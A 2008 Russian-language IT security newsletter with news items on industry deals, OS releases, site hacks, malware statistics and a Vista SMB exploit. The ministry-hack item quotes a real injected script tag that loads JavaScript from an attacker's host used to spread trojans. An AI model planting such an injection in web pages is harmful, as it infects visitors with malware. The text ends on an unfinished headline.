uinC NewsLetter #38, 2008


Приветствуем!

Новости из Security Мира

15/09/2008 09:30 Mail.Ru купил мобильный ICQ-клиент
Портал Mail.Ru приобрел ресурс Smape.com и мобильный ICQ-клиент Sm@per, пишет "Коммерсант". Владелец сервисов Никита Зубов подтвердил факт продажи, но уточнил, что сохранил за собой право на процент с прибыли. Smape.com, занимающийся обзорами мобильников, стал базой для создания сервиса Mobile.Mail.Ru. В настоящее время Smape.com, который в месяц посещало до 500 тысяч человек, перенаправляет посетителей на соответствующий сервис Mail.Ru. В то же время страница Sm@per до сих пор работает. Разработчики Sm@per перешли в Mail.ru. Пока неизвестно, как будет интегрирован в Mail.Ru Sm@per. По данным Зубова, на основе ICQ-клиента разработают мобильную версию мессенджера "Mail.Ru@Агент". По данным близкого к сделке источника газеты, сумма инвестиций составила 2 миллиона долларов, а сама покупка была завершена еще в июле 2008 года. Сам Smape.com при этом прибыли не приносил и находился в инвестиционной фазе развития.
Подробности

15/09/2008 09:58 Разработчики стандартов решили создать гигабитный Wi-Fi
Рабочая группа Института инженеров по электротехнике и радиоэлектронике (IEEE) на прошлой неделе предложила создать комиссию по разработке нового стандарта беспроводной связи, который позволит обмениваться информацией со скоростью до гигабита в секунду. Об этом пишет PC World. Поиск возможности создания устройств, работающих по стандарту 802.11 WLAN и при этом поддерживающих гигабитные скорости обмена данными, начались еще в прошлом году. Предполагается, что новые передатчики будут работать в двух диапазонах - 60 гигагерц на короткой дистанции и менее 6 гигагерц для обычных для нынешней беспроводной связи расстояний. Новый стандарт придет на смену стомегабитному 802.11n, разработка которого только заканчивается. Устройства, поддерживающие 802.11n, используют черновую версию стандарта и обеспечивают пропускную способность от 130 до 170 мегабит в секунду. Предполагается, что минимальная скорость обмена данными на одном канале нового стандарта составит 500 мегабит в секунду, а использование сразу нескольких каналов позволит пересечь гигабитный рубеж. Предполагается, что разработка стандарта для гигабитного Wi-Fi завершится в 2012-2013 годах.
PC World

15/09/2008 10:15 В HP пишут альтернативу Windows Vista
Компания Hewlett-Packard рассматривает возможность создания собственной операционной системы на основе ядра Linux, которая будет предлагаться взамен Windows Vista. По мнению экспертов, такое решение позволит производителю ПК не зависеть от платформ сторонних разработчиков и укрепит позиции вендора на мировом рынке. Крупнейший в мире производитель персональных компьютеров, компания Hewlett-Packard разрабатывает свою операционную систему, пишет businessweek.com. По сообщениям источников в компании, HP собирается предложить ее покупателям своих ПК вместо Windows Vista. Девять месяцев назад компания сформировала группу разработчиков во главе со Сьюзи Ви (Susie Wee), бывшим директором исследовательских лабораторий HP. Новой команде поручена разработка сенсорных технологий и специализированного программного обеспечения для более удобного просмотра фильмов и фотографий на компьютерах, работающих под управлением Windows Vista. В процессе этой работы среди инженеров возникла идея создания собственной операционной системы HP, рассказывает главный технический директор HP Personal Systems Group Фил МакКинни (Phil McKinney). Он не отрицает, что это действительно обсуждается среди разработчиков, но не на уровне совета директоров. По словам МакКинни, в любом случае компания не выделяла на эти цели существенных ресурсов. Операционная система, по замыслу специалистов Hewlett-Packard, может стать массовой, а не рассчитанной только на ПК этой марки. Она будет создана на базе ядра Linux, но станет проще и понятнее большинству пользователей, у которого переход с Windows на Linux вызывает затруднения, отмечают источники. Можно вспомнить, что новый проект — не первая разработка Hewlett-Packard UNIX-подобной ОС (специалистам неплохо известна проприетарная ОС HP-UX). По мнению экспертов, выпустив собственную ОС, HP не будет зависеть от сторонних поставщиков, таких, как Microsoft, и сможет укрепить свою позицию на рынке персональных компьютеров, предложив «Apple-подобный» вариант продукта, когда на фирменном компьютере стоит фирменная операционная система. В последнее время наблюдается непрекращающийся рост продаж компьютеров Apple Macintosh, который в несколько раз обгоняет рост продаж по отрасли в целом. Объясняется это в том числе тем фактом, что компьютеры Apple продаются с надежной, красивой, удобной и поэтому весьма успешной проприетарной системой Mac OS. X. Как сообщают источники, именно Apple, явилась главным мотивирующим фактором для разработки HP своей операционной системы. Желание HP создать нечто собственное находится в русле современной тенденции. Компании Intel и Dell, к примеру, уже давно говорят об альтернативных операционных системах для своих малобюджетных лэптопов. У Intel есть даже специальный открытый проект Moblin Software Platform, осуществляющий разработку приложений для нетбуков и интернет-устройств. Не так давно крупнейший в мире производитель микросхем приобрел Opened Hand, разработчика открытого программного обеспечения, который станет членом этого проекта.
Источник

15/09/2008 10:37 Конфликт из-за изменения политики распространения новой версии Firefox
Пользователи, внимательно следящие за ходом работ над очередным релизом Ubuntu 8.10 (Intrepid Ibex) в немалой степени обеспокоены введением компанией Mozilla пользовательского лицензионного соглашения (EULA) на web-браузер Firefox начиная с версии 3.0.2. Так после установки соответствующего пакета и первичном запуске браузера он будет выдавать сообщение с требованием принять EULA либо отказаться от дальнейшего использования. Mozilla позиционирует свой такой ход, как средство защиты торговой марки Firefox, сообщает opennet.ru. Некоторые пользователи выражают негодование по поводу необходимости соглашаться с EULA, которую они называют не иначе, как «бесполезная лицензия». Позиция Марка Шатлворта оказалась более взвешенной, но в тоже время более жесткой по отношению к Mozilla. В частности он заявил, что рекомендации и требования создателей Firefox по использованию этой торговой марки абсолютно целесообразны и многие открытые проекты сами давно этим занимаются. Примером этому является, в том числе, и Ubuntu. Но введение EULA не может считаться адекватным действием и вызывает сожаление. Тем не менее кто, как не Mozilla знает, какие юридические ограничения она на себе испытывает, и какие действия в связи с этим ей следует предпринимать. Шатлворт призывает сообщество делиться конструктивными соображениями и в свою очередь выдвигает идею создания собственной сборки браузера. Он сможет использовать исходные коды Firefox, и не будет настаивать на принятии каких-либо пользовательских лицензий. В настоящее время для Ubuntu уже создан мета-пакет abrowser, убирающий из пакета с firefox все логотипы и названия, защищенные торговыми марками. В качестве другого варианта было предложено перейти на использование Iceweasel, клона Firefox, используемого, после конфликта в 2006 году, в проекте Debian GNU/Linux.
Подробности

15/09/2008 11:19 Сайт Министерства связи заражен хакерами
В коде одной из страниц официального портала Министерства связи (www.minsvyaz.ru) обнаружен скрипт, предназначенный для загрузки вирусов с хакерского сайта. Вредоносный инжект находится в наиболее популярном разделе http://minkomsvjaz.ru/ministry/documents/ , где публикуются федеральные законы и другие важнейшие документы. Хакерский скрипт в HTML-коде данной страницы Минкомсвязи выглядит так: <head><script language="javascript" src="http://v.freetl.info/day.js"></script><title>Министерство связи РФ</title>. В настоящее время хакерский код не выполняет вредоносных действий - поскольку вызываемый им сайт v.freefl.info не отвечает. Однако еще недавно этот сайт использовался для загрузки троянов. Вероятно, после попадания сайта в "черные списки" хакеры переехали на новые адреса. Однако наличие такой дыры на сайте Минкомсвязи означает, что на ресурсе российского министерства можно легко разместить и "боевой" хакерский скрипт.
Источник
Информация на nag.ru

15/09/2008 12:00 Американские самолеты будут управляться свободным ПО
Американское военное ведомство может начать использовать программное обеспечение с открытым исходным кодом в пилотируемых и беспилотных летательных аппаратах, а также во внутренних разработках самого министерства. Соответствующий законопроект сейчас находится на рассмотрении в Конгрессе США. Проект бюджета оборонного ведомства США на 2009 год, находящийся на рассмотрении в Конгрессе США, указывает, среди прочего, на целесообразность оснащения пилотируемых и беспилотных летательных аппаратов ПО с открытым исходным кодом, а также на возможность его использования в качестве альтернативы коммерческим системам при разработке электронной системы информации о состоянии здоровья личного состава. Кроме того, в своем отзыве о законопроекте комитет по вооруженным силам палаты представителей Конгресса США указывает Минобороны на необходимость более широкого распространения open source во внутренних разработках министерства. Как отмечает агентство Government Computer News, пока непонятно, сохранятся ли данные рекомендации в законопроекте после прохождения им слушаний в Сенате. Но само появление упоминаний о ПО с открытым исходным кодом не во внутренних документах и руководствах Минобороны, а в законодательном акте, а также соответствующие рекомендации профильного комитета Конгресса, говорит о том, что Минобороны США, традиционно осторожно относившееся к СПО, может изменить свою политику. Вместе с тем, рекомендацию комитета нельзя назвать полностью неожиданной. Ранее ряд различных подразделений Вооруженных сил США в той или иной степени оглашал планы по использованию open source. Так, например, в начале этого года прозвучало громкое заявление заместителя начальника штаба ВМС США Марка Эдвардса (Mark Edwards) о том, что ВМС собирается перейти на открытую сетевую архитектуру, отказавшись от привязанных к конкретным вендорам и системам, и, как часть этого плана, использовать ПО с открытым исходным кодом. А в 2007 году возможность использования open source в качестве альтернативы коммерческому ПО подтвердил CIO ВМС США Роберт Кэри (Robert Carey) в своем «Руководстве по использованию ПО с открытым исходным кодом». Судя по наличию в законопроекте прямого указания на использование СПО в летательных аппаратах и наземных станциях, аналогичное течение существует и в ВВС США.
Источник

15/09/2008 14:13 Челябинские провайдеры могут оказаться на скамье подсудимых
Челябинские жильцы столкнулись с варварским вторжением в их собственность. Общему домовому имуществу угрожают компании, предоставляющие услуги кабельного ТВ и Интернет. По их инициативе ломаются замки на чердаках, разрушается ремонт подъездов при прокладке кабеля, страдает кровля. Все это делается без всякого разрешения и соответствующих документов. Как власти собираются с этим бороться, сообщил сегодня, 15 сентября, первый заместитель главы Челябинска Сергей Давыдов. Подробности – в материале «УралПолит.Ru». По словам вице-мэра, у абсолютного большинства подобных организаций отсутствуют правильно оформленные документы. Действуя напролом, они нарушают право собственности жильцов. Прежде чем проводить какие-либо работы и спиливать замки, компании должны спросить мнение жителей дома. Разрешение на это должно давать общее собрание. А такое самоуправство чиновник назвал безобразием. «Такие компании как Диван-ТВ и им подобные творят настоящий беспредел. С этим необходимо бороться и подключать к работе правоохранительные органы», – заявил Сергей Давыдов. В настоящий момент ни одна из действующих в Челябинске организаций не предоставила управляющим компаниям полный пакет документов. При этом они ссылаются на то, что установили договор с неким Ивановым или Сидоровым. А по закону не менее 2/3 собственников жилья должны проголосовать за возможность использования объектов общего пользования для проведения линий Интернета и кабельного ТВ. Отсутствие легитимных документов у поставщиков трафика вынудило мэрию пойти на жесткие меры. Управление жилищно-коммунального хозяйства Челябинска разработало специальную программу противодействия самоуправству. Жильцам необходимо обращаться в правоохранительные органы. В администрации уверяют, что уже готовы выслушивать жалобы жильцов и принимать их к рассмотрению. В мэрии заявляют, что во что бы то ни стало переведут эту деятельность в законное русло. Иначе такие благие начинания, как подключение к глобальной сети и кабельному ТВ превращаются в повреждение кровли и мест общего пользования. «Права собственников жилья будут защищаться. Мы будем ставить вопрос о возбуждении уголовных дел за самоуправство. Конечно, после взлома замка на чердаке нам будет трудно вести речь о серьезном ущербе. Но такие факты будут обобщаться: с последующей постановкой вопроса о привлечении к уголовной ответственности руководителей компаний, замешанных в организации самоуправных действий в масштабе города», – заявил Сергей Давыдов.
Источник

16/09/2008 09:29 В новом iPhone установят процессор ARM
Руководитель команды разработчиков чипов Apple Вей-хан Льен (Wei-han Lien) раскрыл в социальной сети LinkedIn подробности о следующем поколении смартфонов iPhone, пишет колумнист The New York Times Эшли Вэнс. В своем профиле Льен написал, что работает над процессором ARM для нового iPhone. Это означает, что над ARM работают и в купленной Apple почти за 300 миллионов долларов компании PA Semi, так как именно она должна была заняться созданием новых чипов для iPhone и iPod. В нынешних iPhone также используются процессоры ARM, весьма распространенные в мобильных устройствах. Такие чипы изготавливают по лицензии британской ARM Holdings и часто дорабатывают. До сих пор, по неофициальным данным, в iPhone использовались чипы ARM производства Samsung. Собственный чип позволит Apple расширить функциональность устройства, сократить издержки и, возможно, встроить в процессор графическое ядро. PA Semi специализируется на выпуске быстрых чипов с низким энергопотреблением. Несколько лет назад Apple намеревалась использовать эти чипы в своих ноутбуках и компьютерах, но затем предпочла Intel. Срыв сделки заставил PA Semi искать новых контрагентов, среди которых оказались военные заказчики.
Подробности

16/09/2008 09:57 Рассказ о неполадках Xbox 360 стоил тестеру Microsoft работы
Компания Microsoft уволила сотрудника, который согласился дать комментарии журналисту по поводу неисправностей игровой консоли Xbox 360, пишет 1UP.com со ссылкой на VentureBeat. Роберт Делавэр (Robert Delaware), который подписал контракт с компанией через агентство Excell Data, занимался тестированием игровой продукции. Теперь он не только лишился работы, но и получил два гражданских иска - от Microsoft и VMC, где он раньше работал с консолями Xbox 360. В начале текущего месяца журналист Дин Такахаси (Dean Takahashi) опубликовал статью, в которой рассказал о том, что Microsoft знала о неисправностях Xbox 360 еще до начала официальных продаж. Роберт Делавэр помог ему в написании этого материала, раскрыв дополнительную информацию о запуске консоли. По словам Такахаси, тестер полностью осознавал, чем он рискует. Сам Делавэр сказал, что не сожалеет о содеянном. Он уверен, что поступил правильно, раскрыв секреты Microsoft без соответствующего разрешения. В статье, которую опубликовал Дин Такахаси, утверждается, что руководство Microsoft решило проигнорировать многочисленные технические недоработки, чтобы выпустить приставку раньше конкурентов. Спешка привела к тому, что из 100 консолей, которые сходили с конвейера в первые месяцы после начала производства, 68 были неисправны. Помимо этого журналист утверждает, что Microsoft хотела сэкономить лишние деньги, в результате чего тестирование консолей не принесло должного эффекта.
Источник

16/09/2008 10:28 Трояны по-прежнему «в моде»
В первом полугодии 2008 г. аналитики «Лаборатории Касперского» обнаружили 367 772 новые вредоносные программы - в 2,9 раз или на 188,85% больше, чем во втором полугодии 2007 г. Такие темпы роста значительно превосходят итоги 2007 г., когда было обнаружено на 114% вредоносных программ больше, чем в 2006 г. Так, согласно отчету «Лаборатории Касперского» под названием «Развитие угроз в первом полугодии 2008 года», программы класса TrojWare по-прежнему являются абсолютными лидерами - на них приходится более 92% всех вредоносных программ. При этом доля TrojWare выросла лишь на 0,43% - это значительно меньше, чем их рост на два с лишним процента в 2007 г. Среди троянских программ растет популярность Trojan-Dropper - все чаще злоумышленники используют тактику сокрытия троянского файла внутри дистрибутивов других программ для одновременной установки на пораженный компьютер максимального количества различных троянов. Вирусописатели стремятся к универсализации троянского кода. Они стали отказываться от практики создания нескольких функциональных модулей, взаимодействующих друг с другом, и пытаются реализовать все функции в рамках одного приложения. В результате в рейтинге популярности троянских программ различных поведений «обычные» Trojan поднялись с пятой позиции на третью. Продолжился рост числа новых троянских программ, нацеленных на кражу паролей к онлайн-играм. В течение первого полугодия аналитики «Лаборатории Касперского» обнаруживали в среднем 273 новых игровых трояна в день, из которых 259 были способны воровать пароли не к одной, а сразу к нескольким онлайн-играм. Подавляющее большинство игровых троянов, обнаруженных в течение последних месяцев, оснащены бэкдор-функционалом, что делает их опасными не только для игроков, но и для всех интернет-пользователей.
Подробнее

16/09/2008 10:40 Заражение сайта BusinessWeek превратили в видео-урок
Cпециалисты по безопасности из компании Sophos выпустили видеоролик о заражении сайта всемирно известного журнала BusinessWeek.com. Заражению подвергся популярный раздел сайта, посвященный вакансиям в крупных компаниях для соискателей с дипломами MBA. Заражение произведено по методу SQL injection. При этом для загрузки дополнительных вредоносных кодов хакерский скрипт обращается к сайту в российском домене. Специалисты Sophos сообщают, что предупредили администрацию BusinessWeek еще на прошлой неделе, но те до сих пор не предприняли никаких мер. В результате через инфицированный сайт может быть заражено множество компьютеров читателей известного издания. По данным Sophos, такие заражения в этом году происходят каждые 5 секунд, то есть по 16.000 сайтов в день.
Видеоролик и статья

16/09/2008 10:59 Первая бета-версия Windows 7 может увидеть свет в середине декабря
Первая бета-версия операционной системы Windows 7, находящейся в разработке, может увидеть свет ближе к концу текущего года. Ожидается, что ранние модификации платформы Windows 7, которая должна стать преемником Windows Vista, будут продемонстрированы в ходе октябрьской конференции Professional Developers Conference (PDC), а также в рамках мероприятия Windows Hardware Engineering Conference (WinHEC), запланированного на ноябрь. Однако бета-тестирование Windows 7 вряд ли начнется ранее середины декабря, хотя избранные тестеры уже получили в свое распоряжение предварительные сборки операционной системы с индексами М1 и М2 (Milestone). Между тем, менеджеры Microsoft в блоге E7 сообщают о готовности к запуску версии программы сбора отзывов Windows Feedback Program для операционной системы Windows 7. В рамках этой инициативы Microsoft собирает статистические данные о системных настройках Windows, частоте использования тех или иных приложений, распределении файлов по папкам и пр. Ожидается, что полученная в рамках программы Windows Feedback Program информация позволит внести дополнительные усовершенствования в следующую версию клиентской операционной системы Microsoft. Согласно имеющимся сведениям, программная платформа Windows 7 будет доступна в 32-битной и 64-битной модификациях и появится на рынке в конце следующего или в начале 2010 года.
Источник

16/09/2008 11:07 Выход ОС PC-BSD 7.0
После 6 месяцев разработки выпущен релиз PC-BSD 7.0, основанный на кодовой базе FreeBSD 7-STABLE и использующий KDE 4.1.1 в качестве графической оболочки, сообщает opennet.ru. В новой версии поддерживается несколько новых вариантов инсталляции: DVD, USB и установка через сеть/интернет. На сайте pbidir.com переработан и расширен список пакетов для PC-BSD 7, устанавливаемых одним кликом. Тем не менее, сохранилась возможность установки стандартных FreeBSD портов. В состав дистрибутива включены: последние версии проприетарных драйверов для видеокарт Nvidia, OpenOffice 2.4.1, Opera 9.52, FireFox 3.0.0.1. Система PC-BSD снабжена графическим инсталлятором и системой автоопределения установленного оборудования. Программы упакованы в собственный формат пакетов - PBI, суть которого в избавлении от зависимостей, путем помещения всех необходимых библиотек в каждый пакет. В настоящий момент сайт перегружен запросами.
Подробности

16/09/2008 11:41 Хакеры стерли результаты исследований на адронном коллайдере
Компьютеры Европейского центра ядерных исследований (CERN) атакованы греческими хакерами. В результате атаки стерты некоторые данные, касающиеся недавно запущенного Большого адронного коллайдера. Сами хакеры сообщили, что в их планы не входило нанесение вреда эксперименту. Они лишь разместили на сайте сообщение о недоработках Греции в области компьютерной безопасности, сообщает "Интерфакс" со ссылкой на греческую телерадиокомпанию. "Никакого серьезного вреда компьютерам нанесено не было, но это напоминает нам о бдительности", - сказал представитель CERN Джеймс Гиллис. Утерянные файлы были восстановлены, но общий доступ к ним закрыт. 10 сентября начались пробные эксперименты на крупнейшем в мире ускорителе элементарных частиц (ФОТО), созданном на границе Швейцарии с Францией. В эксперименте принимают участие ученые со всего мира, в том числе более 700 россиян.
Источник

16/09/2008 12:07 В Турции задержан известный хакер
В Турции задержан хакер, за которым более пяти лет охотились службы безопасности. 35-летний Чатай Эвяпан успел украсть через интернет более пятисот миллионов долларов. Хакеру удалось похитить пароли, личные данные и номера счетов более пятнадцати тысяч кредитных карт в 11 странах мира. Представитель полиции сообщил: «Мы не могли поймать преступника в течение пяти лет. Из-за его неуловимости в сети он получил прозвище Чао. Мошенника поймали с поличным вместе с тремя сообщниками, которые наладили производство и сбыт поддельных банковских кредитных и платежных карт». Хакера задержали в результате совместной спецоперации турецких и американских служб безопасности в пригороде Стамбула.
Источник

16/09/2008 12:48 Выпущен Mac OS X 10.5.5 Update
Компания Apple выпустила очередное обновление для семейства своих ОС под общим названием Leopard (MacOS X 10.5, 10.5.1, 10.5.2, 10.5.3 и 10.5.4) под названием Mac OS X 10.5.5 Update. Список обновлений довольно внушительный и включает очень много обновлений по безопасности, как самой ОС, так и сопутствующего ПО от Apple. Как обычно, для обновления операционной системы пользователи Mac OS X могут воспользоваться как службой Software Update, так и отедльным инсталлятором.
Подробнее об обновлении

17/09/2008 09:58 Intel выпустила шестиядерный процессор
Корпорация Intel выпустила четырех- и шестиядерные процессоры на архитектуре Dunnington, которые пополнят серверную линейку Xeon, пишет The Wall Street Journal. Чип Xeon 7400 будет работать на частоте 2,6 гигагерца и стоить от 856 до 2729 долларов, пишет IDG News. Он является последним на архитектуре Dunnington. Последнюю сменит до конца года архитектура Nehalem. Объем кэша третьего уровня у Xeon 7400 составит 16 мегабайт. Все шесть ядер находятся на одной подложке, в то время как обычные четырехъядерные процессоры Intel размещают по два ядра на каждой из двух подложек. Xeon 7400 стал первым процессором, разработанным конструкторским центром Intel в Бангалоре и первым чипом, созданным по 45-нанометровому технологическому процессу за пределами американской Intel.
Подробности

17/09/2008 10:09 Розничные сети назвали цены на iPhone
В России iPhone 3G с 8 гигабайтами памяти будет стоить 23 тысячи рублей, а с 16 гигабайтами - 27 тысяч рублей. Такие цены назвал газете "Коммерсант" источник в одной из российских розничных сетей. Эти цены изданию подтвердил менеджер одного из сотовых операторов "большой тройки". Как пишет газета, МТС будет продавать iPhone через "Евросеть", "Вымпелком" - через "Связной", "Беталинк" и Dixis, а партнерами "Мегафона" станут все сети, кроме "Связного". По данным источников "Коммерсанта", у каждого оператора будет по три-четыре тарифа для iPhone, в том числе и тариф с оплатой телефона в рассрочку. МТС уже запустили предварительную регистрацию заказов на iPhone 3G. Из текста на странице следует, что аппарат поступит в продажу до середины октября. Ранее предзаказ можно было оформить и на сайте "Мегафона", но затем регистрацию закрыли. В конце августа, когда появились первые сведения о том, что iPhone появится в России, аналитики утверждали, что стоимость аппаратов составит от 24 до 26 тысяч рублей. При этом газета "Ведомости" со ссылкой на представителей двух операторов "большой тройки" сообщала, что "Мегафон" будет продавать субсидированные телефоны, стоимость которых окупится за счет длительного контракта.
Более подробно

17/09/2008 10:31 Эксплоит уязвимости Windows Vista
Как сообщает Ruben Santamarta в ОС Windows Vista обнаружена уязвимость, приводящая к DoS при обработке специально сформированного пакета SMB "WRITE_ANDX". Ошибка находится в "srv.sys" и "npfs.sys" при доступе к несуществующему адресу памяти. Для успешной эксплуатации со стороны неавторизованных пользователей требуется доступ по сети к интерфейсу, разрешающему NULL-сессии (например, "\LSARPC" для Vista). Теоретически уязвимость существует также в Windows 2000, XP, Server 2003, Server 2008. Автором приведен подробный анализ уязвимого кода и представлен эксплоит для Metasploit Framework. По данным на 17 сентября 2008 г., уязвимость не устранена.
Описание уязвимости и код эксплоита

17/09/2008 10:50 Компания Cray представила настольный суперкомпьютер
Американский вендор высокопроизводительных вычислительных систем Cray объявил о создании сверхмощного десктопа CX1, в рамках совместного предприятия, в котором принимают участие корпорации Microsoft и Intel. Настольный суперкомпьютер Cray CX1 будет продаваться с предустановленной операционной системой Windows HPC Server 2008 в ценовом диапазоне от 25 до 60 тысяч долларов. Cray CX1 объединяет до 8 нодов (узлов сети) и до 16 процессоров Intel Xeon (dual core либо quad core). Объем оперативной памяти в каждом ноде достигает 64 Гб. Емкость встроенного ПЗУ составляет 4 Тб. Практически бесшумный CX1 функционально совместим с операционными системами Linux. Новый продукт отражает стремление производителей представить высокопроизводительные вычислительные системы (HPC) на массовом рынке. Исследование Совета по конкурентоспособности (Council on Competitiveness) и Управления перспективного планирования оборонных научно-исследовательских работ при Министерстве обороны США (DARPA) показало, что практически все крупные компании, использующие HPC, находят их необходимыми для успешного конкурирования и выживания на рынке. Однако малые предприятия не могут себе позволить такого дорогостоящего оборудования. Аналитики IDC в свою очередь отмечают, что сегмент HPC в течение последних пяти лет демонстрирует один из самых высоких темпов роста на рынке информационных технологий. В частности, в секторе высокопроизводительных вычислительных систем стоимостью до 100 тысяч долларов, согласно прогнозу IDC, будет наблюдаться положительная динамика. CX1 на сегодня является самой доступной по цене моделью HPC, представленной компанией Cray. Производители рассчитывают на интерес к продукту со стороны корпоративных потребителей, высших учебных заведений и научно-исследовательских лабораторий.
Подробности

17/09/2008 11:14 Киберпреступность представляет серьезную угрозу для развития электронной коммерции
Исследователи из Microsoft заявляют, что киберпреступность, в частности кража персональных данных пользователей, угрожает развитию онлайновой коммерции и отрасли финансовых услуг в интернете, сообщает MIS Asia. Используя информацию, собранную с помощью фишинговых атак, шпионских программ, и других противозаконных инструментов, мошенники крадут миллиарды долларов. По данным Microsoft, несмотря на некоторое сокращение потерь от мошеннических операций, наблюдавшееся в 2007 году, только в Соединенных Штатах они составили 45 миллиардов долларов. В новом отчете, опубликованном в понедельник, исследователи утверждают, что кибермошеники заставляют клиентов усомниться в надежности онлайновых сервисов. В 2006 году, по данным Microsoft, 12% жителей Европы в возрасте от 16 до 74 лет избегали покупок в интернете из соображений безопасности. По мнению специалистов из Microsoft, стихийный подход, используемый сегодня в управлении персональными данными, не способен противостоять развивающейся преступности. Авторы документа, озаглавленного "Online Identity Theft: Changing the Game", заявляют о необходимости внедрения новой модели обеспечения сохранности персональных данных клиентов. Исследователи предлагают использовать систему, гарантирующую большую степень взаимодействия между компаниями и предоставляющую пользователям более непосредственный контроль над своими личными данными. Ключевым компонентом новой системы, предлагаемой специалистами Microsoft, является технология "Information Card", которая должна помочь в создании более защищенной онлайновой среды.
Отчет в PDF-формате

17/09/2008 12:53 В Chrome обнаружен код Microsoft
В браузере Google Chrome, позиционирующем себя в качестве opencource-продукта, был обнаружен кусок кода авторства Microsoft. Как сообщает The Inquirer, открытие совершил Скотт Ханселман, старший менеджер по программным продуктам корпорации. Если быть точным, речь идет о библиотеке Windows Template Library (WTL), которая позволяет построение пользовательского интерфейса Chrome в среде Windows, однако может использоваться и в других операционных системах. Не исключено, едко замечают журналисты, что программеры Google просто взяли Windows Template Library, которая вполне годна для использования в небольших софтинах с ограниченным набором элементов и диалогов, из хранилища бесплатного софта SourceForge. В Google заявили, что им пришлось дизассемблировать исходные коды Windows Vista, чтобы заставить WTL работать.
Подробности

17/09/2008 13:56 ЦИКу не хватает серверов
Общественная организация "Голос" передала руководителю Центральной избирательной комиссии (ЦИК) Владимиру Чурову открытое письмо, подписанное "рядом экспертов", выразивших обеспокоенность исчезновением архива данных о выборах, проходивших с 1993 по 2003 год. "Несомненно, в последние годы Центризбирком РФ много делал для увеличения информационной открытости данных о выборах, активно наполнялись информационные базы по прошедшим и текущим выборам, планомерно и системно создавались сайты региональных избирательных комиссий. В частности на портале Центризбиркома РФ в 2006 году постепенно начали размещать большой архив по выборам, начиная с 1993 г. К примеру, весной 2007 года там появилось немало данных по выборам 1995-1999 гг., ранее недоступных даже экспертам в области электоральной статистики", - говорится в обращении. На прошлой неделе с призывом подписать это письмо обратилась к читателям своего блога Марина Литвинович, студентка и по совместительству политтехнолог. Как сообщается на сайте ассоциации "Голос", в ответ на обращение Чуров объяснил, что статистические данные недоступны "в связи с отсутствием технических возможностей сервера", однако при этом "весь архив статистических данных по выборам начиная с 1993 года в настоящий момент пополняется и будет доступен в ближайшее время на сайте ЦИК России". Что именно подразумевается под "техническими возможностями сервера", остается только гадать. Однако в контексте грядущего эксперимента по проведению электронных выборов ссылка на недостаток технических средств выглядит довольно нелепо.
Источник

18/09/2008 10:00 Хакеры взломали почтовый ящик Сары Пэйлин
Хакеры взломали электронный ящик кандидата в вице-президенты США Сары Пэйлин на сайте Yahoo! и опубликовали в интернете фрагменты ее личной переписки, передает в среду агентство Associated Press. В частности, хакеры получили доступ к переписке Пэйлин со своим заместителем Шоном Пэрнеллом (Sean Parnell), в которой обсуждался некий телеведущий, критично отзывающийся о последнем. Помимо этого к хакерам попали электронные письма, которыми Пэйлин обменивалась со своим мужем Тоддом, а также с некой Эми Маккоркел (Amy McCorkell). О содержании этих писем агентство не сообщает. Штаб республиканского кандидата в президенты Джона Маккейна уже выступил с заявлением, в котором резко осудил взлом личного почтового ящика губернатора Аляски. "Это грубое вмешательство в личную жизнь губернатора и нарушение закона. Дело было передано в компетентные органы, и мы надеемся, что граждане, сохранившие у себя личные письма губернатора, уничтожат их незамедлительно", - говорится в официальном заявлении предвыборного штаба Маккейна. Неделю назад неназванный активист-республиканец из штата Аляска потребовал от Пэйлин опубликовать 1100 электронных писем, которые не были доступны общественности ранее. По его данным, содержание по меньшей мере сорока писем Пэйлин было известно ее мужу, хотя тот не имел права доступа к деловой переписке губернатора, так как не является госслужащим. Кроме того, Пэйлин упрекали в том, что для ведения деловой переписки о делах штата она использовала не официальный почтовый ящик, а электронную почту на общедоступном сервисе компании Yahoo!, не предоставляющую стопроцентных гарантий сохранности информации.
Подробности

18/09/2008 10:24 "Билайн" исправил сбой в своей сети
Проблема с дозвоном на часть номеров "Билайна" решена. Об этом заявила пресс-секретарь "Билайна" Екатерина Осадчая корреспонденту "Ленты.ру", сославшись на результаты мониторинга. По словам Осадчей, сбой произошел в системе коммутации и затронул часть московских абонентов, чьи телефонные номера начинались на 903 и 962. На время заявления пресс-секретаря при наборе телефонных номеров на 962 звонящему сообщалось, что такого номера не существует. Изначально предполагалось, что сбой, появившийся 17 сентября, исправят к часу дня по московскому времени. Тем не менее, дозвониться на некоторые телефоны было нельзя и к этому сроку, а по данным аналитика Mobile Research Group Эльдара Муртазина, исправить сбой должны были к 18 часам. "Билайн" - торговая марка компании "Вымпелком", входящей в "большую тройку" мобильных операторов. На территории России у "Вымпелкома" свыше 40 миллионов абонентов, в том числе около 8 миллионов - в Москве.
Источник

18/09/2008 10:50 Пользователей ICQ отрезали друг от друга
Многочисленные пользователи популярного инстант-мессенджера ICQ, принадлежащего компании AOL, сообщают о возникновении проблем при отправке посланий другим людям. Сообщения не доходят, а вместо них появляется уведомление, в котором говорится, что пользователь должен пройти проверку на сайте validate.icq.com. Пройти проверку и восстановить возможность общения через ICQ не удается. Данная проблема появляется в различных ICQ-клиентах у пользователей из разных стран, в том числе из России. Представители ICQ не давали никаких официальных объяснений по этому поводу.
CNews

18/09/2008 11:11 «Яндекс» пережил сбой в работе
Сегодня утром, 18 сентября, пользователи не могли получить доступ к сервисам поисковой системы «Яндекс». Сайт был недоступен по техническим причинам. Проблемы в работе «Яндекса» наблюдались несколько часов. Представители компании не давали официальных комментариев по этому поводу.
Источник
Обсуждение на Nag.ru

18/09/2008 11:33 Microsoft открыла новый ресурс для ИТ-специалистов TechDays.ru
Корпорация Microsoft открыла специализированный онлайновый ресурс TechDays.ru, ориентированный на экспертов в области информационных технологий и разработчиков. На сайте TechDays.ru можно бесплатно прослушать более пятидесяти технических докладов по разработке приложений и администрированию инфраструктуры предприятия с помощью решений Microsoft. На ресурсе размещены как небольшие пятнадцатиминутные веб-трансляции, дающие обзор по той или иной теме, так и расширенные доклады. После прослушивания материала пользователю будет предложено ответить на пять вопросов по соответствующей теме. Тот, кто справится с заданиями теста, сможет принять участие в розыгрыше призов, а также получит возможность бесплатно посетить оффлайновые конференции Microsoft TechNet и "Дни разработчика" в одном из городов России. Те пользователи, которым не удастся правильно ответить на все вопросы теста после прослушивания виртуальной презентации, смогут принять участие в семинарах на платной основе. Стоимость семинара составит 1000 рублей. Конференции Microsoft TechNet и "Дни разработчика" будут проходить в октябре и ноябре в ряде крупных российских городов, в том числе в Москве, Санкт-Петербурге, Самаре, Екатеринбурге и Нижнем Новгороде.
Расписание семинаров

18/09/2008 11:55 Критическая уязвимость в phpMyAdmin
